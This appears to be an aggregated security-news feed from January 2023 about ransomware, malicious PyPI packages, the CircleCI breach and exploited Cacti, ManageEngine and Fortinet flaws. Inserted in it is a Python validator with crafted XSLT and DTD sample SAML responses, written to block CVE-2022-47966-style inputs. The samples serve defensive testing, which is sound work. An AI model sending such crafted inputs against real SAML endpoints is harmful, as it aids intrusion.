                2023-01-18 https://www.bleepingcomputer.com/news/technology/bank-of-america-starts-restoring-missing-zelle-transactions/
Bank of America has started to restore missing Zelle transactions that suddenly disappeared from customers’ bank accounts this morning, causing some to dip into negative balances. [...] "

Autosummary: Bank of America customers have been angrily voicing their concerns about the missing transactions, with some reporting that it caused them to dip into negative balances. "


                Bitzlato crypto exchange seized for ransomware, drugs money laundering

                financial exploits ransomware
                2023-01-18 https://www.bleepingcomputer.com/news/security/bitzlato-crypto-exchange-seized-for-ransomware-drugs-money-laundering/
                The U.S. Department of Justice arrested and charged Russian national Anatoly Legkodymov, the founder of the Hong Kong-registered cryptocurrency exchange Bitzlato, with helping cybercriminals allegedly launder illegally obtained money. [...] "

                Autosummary: Chainalysis added that, according to its estimations, the crypto exchange "received $206 million from darknet markets, $224.5 million from scams, and $9 million from ransomware attackers. "


                CircleCI: Malware stole GitHub OAuth keys, bypassing 2FA

                exploits
                2023-01-18 https://www.malwarebytes.com/blog/news/2023/01/circleci-malware-stole-github-oauth-keys-bypassing-2fa

                CircleCI, a big name in the DevOps space, has released an incident report about a data breach it experienced early this month.


                The post CircleCI: Malware stole GitHub OAuth keys, bypassing 2FA appeared first on Malwarebytes Labs.

                "

                Autosummary: CircleCI made an official announcement of its security breach on January 4 of this year, urging all its clients to rotate "any and all" their secrets—passwords or private keys—stored in CircleCI and review logs for unauthorized access occurring between December 21, 2022, and January 4, 2023. "


                Earth Bogle Campaign Unleashes NjRAT Trojan on Middle East and North Africa

                exploits
                2023-01-18 https://thehackernews.com/2023/01/earth-bogle-campaign-unleashes-njrat.html
                An ongoing campaign dubbed Earth Bogle is leveraging geopolitical-themed lures to deliver the NjRAT remote access trojan to victims across the Middle East and North Africa. "The threat actor uses public cloud storage services such as files[.]fm and failiem[.]lv to host malware, while compromised web servers distribute NjRAT," Trend Micro said in a report published Wednesday. Phishing emails, "

                Autosummary: "


                Microsoft investigates bug behind unresponsive Windows Start Menu

                exploits
                2023-01-18 https://www.bleepingcomputer.com/news/microsoft/microsoft-investigates-bug-behind-unresponsive-windows-start-menu/
                Microsoft is investigating an issue causing the Windows taskbar and Start Menu to become unresponsive and triggering Outlook and Teams login problems. [...] "

Autosummary: "In this case, profapi.dll will start recovering the ACLs, but after a second failure, it won’t write the All Application Packages ACLs, causing issues (crashes & registration failures) with packaged apps. "


                Bitzlato crypto founder charged with $700m financial crimes

                financial
                2023-01-18 https://www.bbc.co.uk/news/business-64322576?at_medium=RSS&at_campaign=KARANGA
                Bitzlato co-founder Anatoly Legkodymov is accused of helping to process $700m in illicit funds. "

                Autosummary: "


                Training, endpoint management reduce remote working cybersecurity risks

                ciber
                2023-01-17 https://www.helpnetsecurity.com/2023/01/17/remote-working-cybersecurity-risks/

                33% of companies are not providing any cybersecurity awareness training to users who work remotely, according to Hornetsecurity. The study also revealed that nearly 74% of remote staff have access to critical data, which is creating more risk for companies in the new hybrid working world. Despite the current lack of training and employees feeling ill-equipped, almost 44% of respondents said their organization plans to increase the percentage of employees that work remotely. “The popularity … More

                The post Training, endpoint management reduce remote working cybersecurity risks appeared first on Help Net Security.

                "

Autosummary: Remote working security issues: while companies have adapted to new ways of working, cybersecurity risks linked to remote working still need to be addressed. "


                Researchers Uncover 3 PyPI Packages Spreading Malware to Developer Systems

                exploits
                2023-01-17 https://thehackernews.com/2023/01/researchers-uncover-3-pypi-packages.html
A threat actor by the name Lolip0p has uploaded three rogue packages to the Python Package Index (PyPI) repository that are designed to drop malware on compromised developer systems. The packages – named colorslib (versions 4.6.11 and 4.6.12), hxxpslib (versions 4.6.9 and 4.6.11), and libhxxps (version 4.6.12) – were uploaded by the author between January 7, 2023, and January 12, 2023. They have since been "

                Autosummary: "


                PoC for critical ManageEngine bug to be released, so get patching! (CVE-2022-47966)

                exploits
                2023-01-17 https://www.helpnetsecurity.com/2023/01/17/cve-2022-47966-poc/

If your enterprise is running ManageEngine products that were affected by CVE-2022-47966, check now whether they’ve been updated to a non-vulnerable version, because Horizon3 will be releasing technical details and a PoC exploit this week. GreyNoise has yet to detect in-the-wild exploitation attempts, but you better believe they are coming. “The vulnerability is easy to exploit and a good candidate for attackers to ‘spray and pray’ across the Internet,” vulnerability researcher James Horseman opined. About … More

                The post PoC for critical ManageEngine bug to be released, so get patching! (CVE-2022-47966) appeared first on Help Net Security.

                "

                Autosummary: About CVE-2022-47966 CVE-2022-47966 is an unauthenticated remote code execution vulnerability that has been found by a researcher with Viettel Cyber Security in two dozen ManageEngine products, including Access Manager Plus, ADSelfService Plus, Endpoint DLP, Password Manager Pro, PAM360, ServiceDesk Plus, and others. "


                Hackers Can Abuse Legitimate GitHub Codespaces Feature to Deliver Malware

                exploits
                2023-01-17 https://thehackernews.com/2023/01/hackers-can-abuse-legitimate-github.html
                New research has found that it is possible for threat actors to abuse a legitimate feature in GitHub Codespaces to deliver malware to victim systems. GitHub Codespaces is a cloud-based configurable development environment that allows users to debug, maintain, and commit changes to a given codebase from a web browser or via an integration in Visual Studio Code. It also comes with a port "

                Autosummary: "You can also forward a port manually, label forwarded ports, share forwarded ports with members of your organization, share forwarded ports publicly, and add forwarded ports to the codespace configuration," GitHub explains in its documentation. "


Zoho ManageEngine PoC Exploit to be Released Soon - Patch Before It’s Too Late!

                exploits
                2023-01-17 https://thehackernews.com/2023/01/zoho-manageengine-poc-exploit-to-be.html
                Users of Zoho ManageEngine are being urged to patch their instances against a critical security vulnerability ahead of the release of a proof-of-concept (PoC) exploit code. The issue in question is CVE-2022-47966, an unauthenticated remote code execution vulnerability affecting several products due to the use of an outdated third-party dependency, Apache Santuario. "This vulnerability allows an "

                Autosummary: "
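The ManageEngine entries above attribute CVE-2022-47966 to an outdated Apache Santuario (XML Security for Java) dependency on the SAML SSO path, and note that an unauthenticated request is enough; the page does not spell out the failing code path, and this block does not claim to. What a relying party can do regardless is refuse to hand suspicious documents to the XML-Signature library at all. The following is an added example (my code, not Zoho's, Horizon3's or Santuario's) of that pre-validation gate: it decodes the `SAMLResponse`, rejects DTDs and entity declarations, requires a `ds:Signature`, and allows only the two kinds of transform a SAML relying party ever needs (enveloped-signature and canonicalization), so an XSLT transform or any other non-allowlisted algorithm is rejected before any signature processing happens. The sample responses are constructed, with placeholder digest and signature values; the parser is the stdlib ElementTree (in production, a hardened parser such as defusedxml is the better choice).

```python
import base64
import xml.etree.ElementTree as ET

DS = "{http://www.w3.org/2000/09/xmldsig#}"
SAMLP = "{urn:oasis:names:tc:SAML:2.0:protocol}"
XSLT = "http://www.w3.org/TR/1999/REC-xslt-19991116"

# The only transforms a SAML relying party needs: enveloped-signature plus canonicalization.
ALLOWED_TRANSFORMS = {
    "http://www.w3.org/2000/09/xmldsig#enveloped-signature",
    "http://www.w3.org/2001/10/xml-exc-c14n#",
    "http://www.w3.org/2001/10/xml-exc-c14n#WithComments",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315#WithComments",
}


def check_saml_response(b64_response):
    """Gate run before the XML-DSig library sees the document.
    Returns (accepted, reasons); an empty reasons list means nothing was objectionable."""
    try:
        xml_bytes = base64.b64decode(b64_response, validate=True)
    except ValueError as exc:
        return False, [f"SAMLResponse is not valid base64: {exc}"]
    head = xml_bytes[:4096].lower()
    if b"<!doctype" in head or b"<!entity" in head:
        # Refuse before parsing: a SAML response never legitimately carries a DTD.
        return False, ["DTD or entity declaration present"]
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        return False, [f"malformed XML: {exc}"]
    reasons = []
    if root.tag != SAMLP + "Response":
        reasons.append(f"root element is {root.tag}, not samlp:Response")
    if not list(root.iter(DS + "Signature")):
        reasons.append("no ds:Signature element")
    for transform in root.iter(DS + "Transform"):
        alg = transform.get("Algorithm", "")
        if alg not in ALLOWED_TRANSFORMS:
            kind = "XSLT" if alg == XSLT else "non-allowlisted"
            reasons.append(f"{kind} transform in signature: {alg or '(missing Algorithm)'}")
    return not reasons, reasons


def _response_with(transforms_xml):
    """Constructed samlp:Response skeleton; digest and signature values are placeholders."""
    doc = (
        '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
        'xmlns:ds="http://www.w3.org/2000/09/xmldsig#" ID="_r1" Version="2.0">'
        '<ds:Signature><ds:SignedInfo>'
        '<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>'
        '<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>'
        '<ds:Reference URI="#_r1"><ds:Transforms>' + transforms_xml + '</ds:Transforms>'
        '<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>'
        '<ds:DigestValue>AAAA</ds:DigestValue></ds:Reference>'
        '</ds:SignedInfo><ds:SignatureValue>AAAA</ds:SignatureValue></ds:Signature>'
        '</samlp:Response>'
    )
    return base64.b64encode(doc.encode()).decode()


BENIGN_RESPONSE = _response_with(
    '<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>'
    '<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>')
XSLT_RESPONSE = _response_with(
    '<ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">'
    '<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">'
    '<xsl:template match="/"><out/></xsl:template></xsl:stylesheet></ds:Transform>')
DTD_RESPONSE = base64.b64encode(
    b"<!DOCTYPE x [<!ENTITY a 'b'>]>"
    b"<samlp:Response xmlns:samlp='urn:oasis:names:tc:SAML:2.0:protocol'/>").decode()

if __name__ == "__main__":
    for name, resp in (("benign", BENIGN_RESPONSE), ("xslt", XSLT_RESPONSE), ("dtd", DTD_RESPONSE)):
        print(name, check_saml_response(resp))
```

This is a filter in front of signature verification, not a replacement for it: after the gate passes, the XML-DSig library still has to verify the signature against the IdP certificate, and it should do so with its own secure-validation mode switched on as well.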


                Fortinet observed three rogue PyPI packages spreading malware

                exploits
                2023-01-17 https://securityaffairs.com/140912/malware/3-pypi-packages-spreading-malware.html

                Researchers discovered three malicious packages that have been uploaded to the Python Package Index (PyPI) repository by Lolip0p group. FortiGuard Labs researchers discovered three malicious PyPI packages (called ‘colorslib’, ‘hxxpslib’, and “libhxxps”) on the PyPI repository that were uploaded by the same actor, Lolip0p. The packages were discovered on January 10, 2023, the packages “colorslib” and […]

                The post Fortinet observed three rogue PyPI packages spreading malware appeared first on Security Affairs.

                "

                Autosummary: "


                Nissan North America data breach caused by vendor-exposed database

                financial
                2023-01-17 https://www.bleepingcomputer.com/news/security/nissan-north-america-data-breach-caused-by-vendor-exposed-database/
                Nissan North America has begun sending data breach notifications informing customers of a breach at a third-party service provider that exposed customer information. [...] "

                Autosummary: "During our investigation, on September 26, 2022, we determined that this incident likely resulted in the unauthorized access or acquisition of our data, including some personal information belonging to Nissan customers," reads the notice. "


                Patch your Zoho ManageEngine instance immediately! PoC Exploit for CVE-2022-47966 will be released soon

                exploits
                2023-01-17 https://securityaffairs.com/140920/hacking/zoho-manageengine-flaw-poc-exploit.html

                A PoC exploit code for the unauthenticated remote code execution vulnerability CVE-2022-47966 in Zoho ManageEngine will be released soon. The CVE-2022-47966 flaw is an unauthenticated remote code execution vulnerability that impacts multiple Zoho products with SAML SSO enabled in the ManageEngine setup. The issue also impacts products that had the feature enabled in the past. The […]

                The post Patch your Zoho ManageEngine instance immediately! PoC Exploit for CVE-2022-47966 will be released soon appeared first on Security Affairs.

                "

Autosummary: "


                Hackers can use GitHub Codespaces to host and deliver malware

                exploits
                2023-01-17 https://www.bleepingcomputer.com/news/security/hackers-can-use-github-codespaces-to-host-and-deliver-malware/
                GitHub Codespaces, a cloud-hosted integrated development environment (IDE), has a port forwarding feature that malicious actors can abuse to host and distribute malware to unaware developers. [...] "

                Autosummary: Theoretically, an attacker could run a simple Python web server, upload malicious scripts or malware to their Codespace, open a web server port on their VM, and assign it "public" visibility. "To validate our hypothesis of threat modeling abuse scenario, we ran a Python-based HTTP server on port 8080, forwarded and exposed the port publicly," reads the Trend Micro report. "


                1,000 ships impacted by a ransomware attack on maritime software supplier DNV

                exploits ransomware
                2023-01-17 https://securityaffairs.com/140941/cyber-crime/ransomware-attack-maritime-firm-dnv.html

                A ransomware attack against the maritime software supplier DNV impacted approximately 1,000 vessels. About 1,000 vessels have been impacted by a ransomware attack against DNV, one of the major maritime software suppliers.  DNV GL provides solutions and services throughout the life cycle of any vessel, from design and engineering to risk assessment and ship management. […]

                The post 1,000 ships impacted by a ransomware attack on maritime software supplier DNV appeared first on Security Affairs.

                "

Autosummary: "


                Hackers turn to Google search ads to push info-stealing malware

                exploits
                2023-01-17 https://www.bleepingcomputer.com/news/security/hackers-turn-to-google-search-ads-to-push-info-stealing-malware/
                Hackers are setting up fake websites for popular free and open-source software to promote malicious downloads through advertisements in Google search results. [...] "

Autosummary: Several security researchers (mdmck10, MalwareHunterTeam, Will Dormann, Germán Fernández) have uncovered additional URLs hosting malicious downloads impersonating free and open-source software, confirming that luring users through sponsored results on Google search is a more common approach for cybercriminals. This malware collects sensitive data from browsers (credentials, credit card, autocomplete info), details about the system (username, location, hardware, security software available), and cryptocurrency. From a different domain, threat actors provided a malicious version of the CCleaner utility for removing potentially unwanted files and invalid Windows Registry entries. "


                Update now! Proof of concept code to be released for Zoho ManageEngine vulnerability

                exploits
                2023-01-17 https://www.malwarebytes.com/blog/news/2023/01/update-now-proof-of-concept-code-to-be-released-for-zoho-manageengine-vulnerability

Categories: Exploits and vulnerabilities, News. Tags: Zoho, ManageEngine, PoC, RCE, CVE-2022-47966, CVE-2022-35405, SAML, Apache Santuario

                Proof of Concept code is about to be released for a vulnerability in many ManageEngine products which could enable RCE with SYSTEM privileges.


                The post Update now! Proof of concept code to be released for Zoho ManageEngine vulnerability appeared first on Malwarebytes Labs.


Autosummary: In September 2022, an RCE vulnerability affecting Zoho ManageEngine PAM360 (versions 5500 and earlier), Password Manager Pro (versions 12100 and earlier), and Access Manager Plus (versions 4302 and earlier) was found to be actively exploited after several PoCs and a Metasploit module for it were made public.


                Top 10 Venmo scams – and how to stay safe

                financial
                2023-01-17 https://www.welivesecurity.com/2023/01/17/venmo-scams-how-stay-safe/

Don’t be the next victim – here’s what to know about some of the most common tricks that scammers use on the payment app


Autosummary: How to stay safe on Venmo: Venmo offers various security protections for its users, including data encryption, account monitoring, 2FA and account PIN codes. Fake payments: If users are trying to sell an item online, such as via Facebook Marketplace, scammers may try to use Venmo to trick them into believing a payment has already been made. Impersonation/money request: Fraudsters sometimes impersonate victims’ friends, using info from their public feeds including profile pics, to make payment requests. The story so far: Venmo began life back in 2009 as an SMS-based tool which gave its founders a handy way to send each other money, without having to use cash or checks.


                Hackers push malware via Google search ads for VLC, 7-Zip, CCleaner

                exploits
                2023-01-17 https://www.bleepingcomputer.com/news/security/hackers-push-malware-via-google-search-ads-for-vlc-7-zip-ccleaner/
Hackers are setting up fake websites for popular free and open-source software to promote malicious downloads through advertisements in Google search results. [...]

Autosummary: At the moment, BleepingComputer and multiple security researchers have seen malicious ads in Google search results for the following software: 7-Zip, Blender 3D, Capcut, CCleaner, Notepad++, OBS, Rufus, VirtualBox, VLC Media Player, WinRAR, Putty. BleepingComputer has shared some of these findings with Google and a company representative told us that the platform’s policies are designed and enforced to prevent brand impersonation. CCleaner malicious download pushed via Google ads (source: BleepingComputer). Several security researchers (mdmck10, MalwareHunterTeam, Will Dormann, Germán Fernández) have uncovered additional URLs hosting malicious downloads impersonating free and open-source software, confirming that luring users through sponsored results on Google search is a more common approach for cybercriminals. This malware collects sensitive data from browsers (credentials, credit card, autocomplete info), details about the system (username, location, hardware, security software available), and cryptocurrency. Malicious downloads for WinRAR, 7-ZIP, VLC in sponsored ads on Google search (source: BleepingComputer). From a different domain, threat actors provided a malicious version of the CCleaner utility for removing potentially unwanted files and invalid Windows Registry entries.


                Brazil Congress: Dozens indicted over 8 January riot

                latam industry
                2023-01-17 https://www.bbc.co.uk/news/world-latin-america-64299892?at_medium=RSS&at_campaign=KARANGA
Thirty-nine people are indicted for their alleged involvement in the violence on 8 January.



Nick Cave says ChatGPT's AI attempt to write Nick Cave lyrics "sucks"

                industry
                2023-01-17 https://www.bbc.co.uk/news/entertainment-arts-64302944?at_medium=RSS&at_campaign=KARANGA
The musician responds after a popular chatbot produces lyrics "in the style of Nick Cave".



                Hackers exploit Cacti critical bug to install malware, open reverse shells

                exploits
                2023-01-16 https://www.bleepingcomputer.com/news/security/hackers-exploit-cacti-critical-bug-to-install-malware-open-reverse-shells/
More than 1,600 instances of the Cacti device monitoring tool reachable over the internet are vulnerable to a critical security issue that hackers have already started to exploit. [...]

Autosummary: “Unfortunately, we can only see the exact running software version when a specific theme (sunrise) is enabled on the web application,” Censys said. However, the company could count 1,637 Cacti hosts reachable over the web that were vulnerable to CVE-2022-46169, many of them (465) running version 1.1.38 of the monitoring solution, released in April 2021.


                Post-quantum cybersecurity threats loom large

                ciber
                2023-01-16 https://www.helpnetsecurity.com/2023/01/16/post-quantum-cybersecurity-threats/

                A new Zapata Computing report reveals a deepening commitment from enterprises that points to a maturing industry with widespread, global interest and increased urgency regarding post-quantum cybersecurity threats. The growing interest in quantum is translating into spending, demonstrated by 71% of quantum-adopting enterprises surveyed having current quantum computing budgets of more than $1 million. This finding represents a 2.5X increase over 2021, where only 28% of quantum-adopting respondents indicated that they had a quantum computing … More


Autosummary: Enterprises get tactical about quantum adoption: Enterprises are taking tactical steps to make quantum computing a reality, with respondents noting that they are building new applications (48%), running experiments on quantum hardware or simulators (62%), and experimenting and building proofs of concept (51%).


                Europol arrested cryptocurrency scammers that stole millions from victims

                financial
                2023-01-16 https://securityaffairs.com/140854/cyber-crime/europol-arrested-cryptocurrency-scammers.html

                An international police operation led by Europol led to the arrest of cryptocurrency scammers targeting users all over the world. An international law enforcement operation conducted by authorities from Bulgaria, Cyprus, Germany and Serbia, supported by Europol and Eurojust, has dismantled a cybercrime ring involved in online investment fraud. The European police have supported this […]



                Avast releases free BianLian ransomware decryptor

                exploits ransomware
                2023-01-16 https://www.bleepingcomputer.com/news/security/avast-releases-free-bianlian-ransomware-decryptor/
Security software company Avast has released a free decryptor for the BianLian ransomware strain to help victims of the malware recover locked files without paying the hackers. [...]

Autosummary: Avast says some common filenames and locations for BianLian are C:\Windows\TEMP\mativ.exe, C:\Windows\Temp\Areg.exe, C:\Users\%username%\Pictures\windows.exe and anabolic.exe. However, because the malware deletes itself after the file encryption phase, it is unlikely that victims will find those binaries on their systems.


                Cacti servers under attack by attackers exploiting CVE-2022-46169

                exploits
                2023-01-16 https://www.helpnetsecurity.com/2023/01/16/exploiting-cve-2022-46169/

                If you’re running the Cacti network monitoring solution and you haven’t updated it since early December, now is the time to do it to foil attackers exploiting a critical command injection flaw (CVE-2022-46169). About Cacti and CVE-2022-46169 Cacti is an open-source front-end app for RRDtool, a system for logging and graphing time series data, i.e., data from sensors and systems that is recorded / collected at regular intervals to create an evolving picture of what … More



                CISA Warns for Flaws Affecting Industrial Control Systems from Major Manufacturers

                industry
                2023-01-16 https://thehackernews.com/2023/01/cisa-warns-for-flaws-affecting.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released several Industrial Control Systems (ICS) advisories warning of critical security flaws affecting products from Sewio, InHand Networks, Sauter Controls, and Siemens. The most severe of the flaws relate to Sewio's RTLS Studio, which could be exploited by an attacker to "obtain unauthorized access to the server, alter



                New Backdoor Created Using Leaked CIA"s Hive Malware Discovered in the Wild

                exploits
                2023-01-16 https://thehackernews.com/2023/01/new-backdoor-created-using-leaked-cias.html
Unidentified threat actors have deployed a new backdoor that borrows its features from the U.S. Central Intelligence Agency (CIA)'s Hive multi-platform malware suite, the source code of which was released by WikiLeaks in November 2017. "This is the first time we caught a variant of the CIA Hive attack kit in the wild, and we named it xdr33 based on its embedded Bot-side certificate CN=xdr33,"



                T95 Android TV Box sold on Amazon hides sophisticated malware

                exploits
                2023-01-16 https://securityaffairs.com/140866/security/t95-android-tv-box-malware.html

                Expert discovered that the T95 Android TV box, available for sale on Amazon and AliExpress, came with sophisticated pre-installed malware. Security researcher, Daniel Milisic, discovered that the T95 Android TV box he purchased on Amazon was infected with sophisticated pre-installed malware. This Android TV box model is available on Amazon and AliExpress for as low […]


Autosummary: To determine whether a T95 Android TV Box has been infected, the researcher recommends checking for the presence of a folder named /data/system/Corejava and a file named /data/system/shared_prefs/open_preference.xml.


                Malicious ‘Lolip0p’ PyPi packages install info-stealing malware

                exploits
                2023-01-16 https://www.bleepingcomputer.com/news/security/malicious-lolip0p-pypi-packages-install-info-stealing-malware/
A threat actor has uploaded to the PyPI (Python Package Index) repository three malicious packages that carry code to drop info-stealing malware on developers' systems. [...]

Autosummary: Files "update.exe" drops on the host (Fortinet). Looking a little further, BleepingComputer found that at least one of the dropped processes is used to collect Discord tokens, suggesting that it is part of a general information-stealing malware campaign used to steal browser data, authentication tokens, and other data from an infected device.


                Avast researchers released a free BianLian ransomware decryptor for some variants of the malware

                exploits ransomware
                2023-01-16 https://securityaffairs.com/140892/malware/free-bianlian-ransomware-decryptor.html

                Antivirus firm Avast released a free decryptor for the BianLian ransomware family that allows victims to recover locked files. Security firm Avast has released a free decryptor for the BianLian ransomware to allow victims of the malware to recover locked files. The BianLian ransomware emerged in August 2022, the malware was employed in attacks against organizations in […]



                Experts spotted a backdoor that borrows code from CIA’s Hive malware

                exploits
                2023-01-16 https://securityaffairs.com/140878/malware/cia-hive-malware-detected.html

Netlab 360 observed unidentified threat actors using a new backdoor based on the US CIA’s Project Hive malware suite. Researchers from Qihoo Netlab 360 reported that unidentified threat actors are using a new backdoor based on the US CIA’s Project Hive malware suite. “Hive provides a covert communications platform for a whole range of CIA malware to send exfiltrated […]



                Vice Society ransomware leaks University of Duisburg-Essen’s data

                exploits ransomware
                2023-01-16 https://www.bleepingcomputer.com/news/security/vice-society-ransomware-leaks-university-of-duisburg-essen-s-data/
The Vice Society ransomware gang has claimed responsibility for the November 2022 cyberattack that forced the University of Duisburg-Essen (UDE) to reconstruct its IT infrastructure, a process that's still ongoing. [...]

Autosummary: Rebuilding UDE's IT infrastructure: The cyberattack was disclosed by UDE on November 28th, 2022, forcing the university to shut down all email, communications, and IT systems until further notice.


                Researchers to release PoC exploit for critical Zoho RCE bug, patch now

                exploits
                2023-01-16 https://www.bleepingcomputer.com/news/security/researchers-to-release-poc-exploit-for-critical-zoho-rce-bug-patch-now/
Proof-of-concept exploit code will be released later this week for a critical vulnerability allowing remote code execution (RCE) without authentication in several Zoho ManageEngine products. [...]

Autosummary: Horizon3 previously released exploit code for CVE-2022-28219, a critical vulnerability in Zoho ManageEngine ADAudit Plus that can let attackers compromise Active Directory accounts; CVE-2022-1388, a critical bug that enables remote code execution in F5 BIG-IP networking devices; and CVE-2022-22972, a critical authentication bypass vulnerability in multiple VMware products that lets threat actors gain admin privileges.


                Researchers to release PoC exploit for critical ManageEngine RCE bug, patch now

                exploits
                2023-01-16 https://www.bleepingcomputer.com/news/security/researchers-to-release-poc-exploit-for-critical-manageengine-rce-bug-patch-now/
Proof-of-concept exploit code will be released later this week for a critical vulnerability allowing remote code execution (RCE) without authentication in several Zoho ManageEngine products. [...]

Autosummary: Horizon3 previously released exploit code for CVE-2022-28219, a critical vulnerability in Zoho ManageEngine ADAudit Plus that can let attackers compromise Active Directory accounts; CVE-2022-1388, a critical bug that enables remote code execution in F5 BIG-IP networking devices; and CVE-2022-22972, a critical authentication bypass vulnerability in multiple VMware products that lets threat actors gain admin privileges.


Industrial espionage: How China sneaks out America's technology secrets

                industry
                2023-01-16 https://www.bbc.co.uk/news/world-asia-china-64206950?at_medium=RSS&at_campaign=KARANGA
The true extent of commercial spying is unknown but experts say it is "pervasive".



                Week in review: ChatGPT as an infosec assistant, Google offers help to EU cybersecurity startups

                ciber
                2023-01-15 https://www.helpnetsecurity.com/2023/01/15/week-in-review-chatgpt-as-an-infosec-assistant-google-offers-help-to-eu-cybersecurity-startups/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Google is calling EU cybersecurity founders Google announced that the Google for Startups Growth Academy: Cybersecurity program now accepts applications from EU companies. Rackspace ransomware attack was executed by using previously unknown security exploit The MS Exchange exploit chain recently revealed by Crowdstrike researchers is how the Play ransomware gang breached the Rackspace Hosted Exchange email environment, the company confirmed … More


Autosummary: Cisco has acknowledged one critical (CVE-2023-20025) and two medium-severity (CVE-2023-20026, CVE-2023-20045) vulnerabilities affecting some of its Small Business series of routers, but won’t be fixing them as the devices “have entered the end-of-life process.” How to protect yourself from bot-driven account fraud: In this Help Net Security video, Nick Rieniets, Field CTO at Kasada, talks about this threat and offers tips on how to protect yourself from bot-driven account fraud.


                Multiple schools hit by Vice Society ransomware attack

                exploits ransomware
                2023-01-15 https://www.malwarebytes.com/blog/news/2023/01/multiple-schools-in-uk-hit-by-vice-society-ransomware-attack

                Categories: News

                Tags: ransomware

                Tags: high society

                Tags: compromise

                Tags: school

                Tags: schools

                Tags: learning

                Tags: documents

                Tags: data

                Tags: leak

                We take a look at reports of 14 schools being compromised by ransomware group Vice Society.


Autosummary: According to the BBC, the data includes: passport scans of both pupils and parents dating back to 2011; contractual offers made to members of staff; the headmaster’s pay and student bursary fund recipients; Special Educational Needs (SEN) data. Other, unnamed confidential documents were seen which belong to a variety of other schools from across all parts of the UK. Impacts from these attacks have ranged from restricted access to networks and data, delayed exams, canceled school days, and unauthorized access to and theft of personal information regarding students and staff… School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable; however, the opportunistic targeting often seen with cyber criminals can still put school districts with robust cybersecurity programs at risk. Over the past several years, the education sector, especially kindergarten through twelfth grade (K-12) institutions, has been a frequent target of ransomware attacks.


                Mexico tightens ban on smoking in public places

                latam
                2023-01-15 https://www.bbc.co.uk/news/world-latin-america-64279351?at_medium=RSS&at_campaign=KARANGA
The step, approved in 2021, means the country now has one of the world's strictest anti-tobacco laws.



                The Week in Ransomware - January 13th 2023 - LockBit in the spotlight

                exploits ransomware
                2023-01-14 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-13th-2023-lockbit-in-the-spotlight/
The LockBit ransomware operation has again taken center stage in the ransomware news, as we learned yesterday they were behind the attack on Royal Mail. [...]

Autosummary: Contributors and those who provided new ransomware information and stories this week include: @DanielGallagher, @PolarToffee, @Seifreed, @billtoulas, @malwareforme, @struppigel, @demonslay335, @Ionut_Ilascu, @FourOctets, @malwrhunterteam, @BleepinComputer, @LawrenceAbrams, @fwosar, @serghei, @pcrisk, @MsftSecIntel, @BrettCallow, @UK_Daniel_Card, @SRMInform, @TGesches, @rapid7, @uuallan, @AShukuhi, and @BushidoToken.


                Cacti Servers Under Attack as Majority Fail to Patch Critical Vulnerability

                exploits
                2023-01-14 https://thehackernews.com/2023/01/cacti-servers-under-attack-as-majority.html
A majority of internet-exposed Cacti servers have not been patched against a recently fixed critical security vulnerability that has come under active exploitation in the wild. That's according to attack surface management platform Censys, which found only 26 out of a total of 6,427 servers to be running a patched version of Cacti (1.2.23 and 1.3.0). The issue in question relates to



Malware Attack on CircleCI Engineer's Laptop Leads to Recent Security Incident

                exploits
                2023-01-14 https://thehackernews.com/2023/01/malware-attack-on-circleci-engineers.html
DevOps platform CircleCI on Friday disclosed that unidentified threat actors compromised an employee's laptop and leveraged malware to steal their two-factor authentication-backed credentials to breach the company's systems and data last month. The CI/CD service CircleCI said the "sophisticated attack" took place on December 16, 2022, and that the malware went undetected by its antivirus



CircleCI's hack caused by malware stealing engineer's 2FA-backed session

                exploits
                2023-01-14 https://www.bleepingcomputer.com/news/security/circlecis-hack-caused-by-malware-stealing-engineers-2fa-backed-session/
Hackers breached CircleCi in December after an engineer became infected with information-stealing malware that stole the employee's 2FA-backed SSO session, allowing access to the company's internal systems. [...]

Autosummary: After learning of the data theft, the company began alerting customers via email about the incident, warning them to rotate all tokens and secrets if they had logged in between December 21st, 2022, and January 4th, 2023.


                Brazil riots: Brasília"s ex-security chief arrested on return to city

                latam government industry
                2023-01-14 https://www.bbc.co.uk/news/world-latin-america-64275368?at_medium=RSS&at_campaign=KARANGA
Anderson Torres is accused of colluding in the storming of Brazil's congress on 8 January.



                Peru protests: President Boluarte "will not resign" despite weeks of violence

                latam
                2023-01-14 https://www.bbc.co.uk/news/world-latin-america-64274088?at_medium=RSS&at_campaign=KARANGA
Weeks of violent anti-government protests have brought large parts of the country to a standstill.



                Brazil Supreme Court includes Jair Bolsonaro in riot probe

                latam industry
                2023-01-14 https://www.bbc.co.uk/news/world-latin-america-64271922?at_medium=RSS&at_campaign=KARANGA
For the first time the ex-president is put among those potentially responsible for the riots.



                Hackers exploit Control Web Panel flaw to open reverse shells

                exploits
                2023-01-13 https://www.bleepingcomputer.com/news/security/hackers-exploit-control-web-panel-flaw-to-open-reverse-shells/
Hackers are actively exploiting a critical vulnerability patched recently in Control Web Panel (CWP), a tool for managing servers formerly known as CentOS Web Panel. [...]

Autosummary: Exploit code readily available: On January 3, researcher Numan Türle at Gais Cyber Security, who had reported the issue around October last year, published a proof-of-concept (PoC) exploit and a video showing how it works.


                Threat actors target govt networks exploiting Fortinet SSL-VPN CVE-2022-42475 bug

                exploits
                2023-01-13 https://securityaffairs.com/140721/hacking/fortinet-ssl-vpn-cve-2022-42475-attacks.html

                Recently patched Fortinet FortiOS SSL-VPN zero-day exploited in attacks against government organizations and government-related targets. Fortinet researchers reported how threat actors exploited the recently patched FortiOS SSL-VPN vulnerability (CVE-2022-42475) in attacks against government organizations and government-related targets. According to Resecurity, a cybersecurity company protecting Fortune 500 globally, the vulnerability was earlier marketed privately by several […]


